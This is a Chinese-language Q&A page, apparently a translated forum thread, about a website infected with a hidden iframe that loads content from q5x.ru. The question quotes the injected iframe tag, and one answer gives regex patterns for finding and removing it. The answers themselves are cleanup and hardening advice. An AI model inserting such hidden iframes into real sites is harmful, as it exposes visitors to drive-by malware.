AskOverflow.Dev

AskOverflow.Dev Logo AskOverflow.Dev Logo

AskOverflow.Dev Navigation

  • 主页
  • 系统&网络
  • Ubuntu
  • Unix
  • DBA
  • Computer
  • Coding
  • LangChain

Mobile menu

Close
  • 主页
  • 系统&网络
    • 最新
    • 热门
    • 标签
  • Ubuntu
    • 最新
    • 热门
    • 标签
  • Unix
    • 最新
    • 标签
  • DBA
    • 最新
    • 标签
  • Computer
    • 最新
    • 标签
  • Coding
    • 最新
    • 标签
主页 / server / 问题 / 126238
Accepted
Andreas Grech
Andreas Grech
Asked: 2009-07-31 01:08:09 +0800 CST2009-07-31 01:08:09 +0800 CST 2009-07-31 01:08:09 +0800 CST

网站被隐藏的 iframe (q5x.ru) 攻击

  • 772

我的一个网站最近感染了某种涉及注入隐藏 iframe 的攻击,它的来源来自一个网站 q5x.ru(请勿链接)。

谷歌搜索并没有帮助我弄清楚这次攻击是如何发生的,所以我想知道你们中是否有人遇到过同样的问题?

iframe 代码是这样的:

<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>

根据要求,我正在运行一个带有数据库的 ASP.Net 网站,就表单而言,显然是用于回发的 ASP.Net 表单。

website exploit malware attacks
  • 4 4 个回答
  • 609 Views

4 个回答

  • Voted
  1. Best Answer
    Aron Rotteveel
    2009-07-31T01:14:27+08:002009-07-31T01:14:27+08:00

    我们最近在我们客户的一个网站上遇到了同样的问题。

    此问题很可能是由主要针对 FTP 客户端并搜索主机名/用户名/密码组合的病毒感染引起的。找到后,将打开与 FTP 服务器的连接,并搜索 index.* 文件并将 iFrame 添加到其中。

    在我们的特殊情况下,我们的客户端是少数可以直接访问 FTP 服务器的客户端之一。我们立即更改了密码,恢复了文件的备份并删除了我们客户的 FTP 访问权限。

    您应该采取的步骤:

    • 立即更改密码
    • 如果您有权访问服务器 FTP 日志,请找出哪些文件已被感染
    • 对于受感染的文件,我强烈建议手动恢复这些文件,默认情况下不要使用搜索/替换。在大多数情况下,IFrame 会添加到文件末尾,但我也看到文件被部分删除。

    另请注意,如果Google 爬虫在受感染时访问您的网站,它会将您添加到恶意软件列表中,这将严重影响您网站的声誉。如果发生这种情况,请采取以下步骤:

    1. 确保该站点不再包含受感染的文件
    2. 确保您的网站已通过Google 网站管理员工具验证
    3. 使用 Google 网站管理员工具请求新网站审核
    • 4
  2. joe
    2009-07-31T01:15:15+08:002009-07-31T01:15:15+08:00

    以下是一些可能对您有所帮助的提示:

    1. 防止此类攻击的第一件事是尽快更改您的 ftp、控制面板和数据库密码。
    2. 将服务器中的文件权限更改为最大安全模式。
    3. 从服务器下载所有文件并检查感染。清理受感染的文件。
    4. 使用优秀的防病毒软件,扫描并清理您用于登录托管服务器的每台 PC。
    5. 切勿使用公共计算机访问您的服务器。

    如何清理受感染的文件?

    使用这些正则表达式搜索包含恶意代码的所有页面并将其替换为空格:

    <iframe src=\”http://[^"]*” width=105 height=175 style=\”visibility:hidden;
    position:absolute\”></iframe>
    
    echo \”<iframe src=\\\”http://[^"]*\” width=105 height=175 style=\\\”
    visibility:hidden; position:absolute\\\”></iframe>\”;
    

    您可能必须编写一个脚本来为服务器中的所有文件自动执行此操作。

    资料来源: http ://www.diovo.com/2009/03/hidden-iframe-injection-attacks/

    https://stackoverflow.com/questions/990437/iframe-script-attack-to-website

    • 3
  3. user14898
    2009-07-31T01:34:39+08:002009-07-31T01:34:39+08:00

    这以前发生在我身上。您需要手动搜索有问题的注入脚本并将其删除。我建议您更改密码并更改数据库和数据库表的名称,以确保

    • 0
  4. Arjan
    2009-07-31T02:52:03+08:002009-07-31T02:52:03+08:00

    尽管@Aron写道,可能某些客户端病毒已经捕获了您的密码(对于这种特定的攻击,这很可能是正确的),但这些攻击通常会利用服务器软件中未修补的漏洞。就像在 Web 服务器本身、CMS 或phpMyAdmin等工具中一样。

    那么:您确定您的服务器上运行的是所有软件的最新版本吗?

    (或者 FTP 日志确实显示了一些活动?)

    • 0

相关问题

  • 设置测试服务器

  • Typo3 网站中的会话超时,无法使用 Mozilla Firefox 打开

  • 虚拟主机建议 [关闭]

  • 谁能推荐一个网站监控服务?[关闭]

  • 上线的第一天:如何不杀死您的网站

Sidebar

Stats

  • 问题 205573
  • 回答 270741
  • 最佳答案 135370
  • 用户 68524
  • 热门
  • 回答
  • Marko Smith

    SFTP 使用什么端口?

    • 6 个回答
  • Marko Smith

    从 IP 地址解析主机名

    • 8 个回答
  • Marko Smith

    如何按大小对 du -h 输出进行排序

    • 30 个回答
  • Marko Smith

    命令行列出 Windows Active Directory 组中的用户?

    • 9 个回答
  • Marko Smith

    Windows 中执行反向 DNS 查找的命令行实用程序是什么?

    • 14 个回答
  • Marko Smith

    如何检查 Windows 机器上的端口是否被阻塞?

    • 4 个回答
  • Marko Smith

    我应该打开哪个端口以允许远程桌面?

    • 9 个回答
  • Marko Smith

    什么是 Pem 文件,它与其他 OpenSSL 生成的密钥文件格式有何不同?

    • 3 个回答
  • Marko Smith

    如何确定bash变量是否为空?

    • 15 个回答
  • Martin Hope
    MikeN 在 Nginx 中,如何在维护子域的同时将所有 http 请求重写为 https? 2009-09-22 06:04:43 +0800 CST
  • Martin Hope
    Tom Feiner 如何按大小对 du -h 输出进行排序 2009-02-26 05:42:42 +0800 CST
  • Martin Hope
    0x89 bash中的双方括号和单方括号有什么区别? 2009-08-10 13:11:51 +0800 CST
  • Martin Hope
    kch 如何更改我的私钥密码? 2009-08-06 21:37:57 +0800 CST
  • Martin Hope
    Kyle Brandt IPv4 子网如何工作? 2009-08-05 06:05:31 +0800 CST
  • Martin Hope
    Noah Goodrich 什么是 Pem 文件,它与其他 OpenSSL 生成的密钥文件格式有何不同? 2009-05-19 18:24:42 +0800 CST
  • Martin Hope
    Brent 如何确定bash变量是否为空? 2009-05-13 09:54:48 +0800 CST
  • Martin Hope
    cletus 您如何找到在 Windows 中打开文件的进程? 2009-05-01 16:47:16 +0800 CST

热门标签

linux nginx windows networking ubuntu domain-name-system amazon-web-services active-directory apache-2.4 ssh

Explore

  • 主页
  • 问题
    • 最新
    • 热门
  • 标签
  • 帮助

Footer

AskOverflow.Dev

关于我们

  • 关于我们
  • 联系我们

Legal Stuff

  • Privacy Policy

Language

  • Pt
  • Server
  • Unix

© 2023 AskOverflow.DEV All Rights Reserve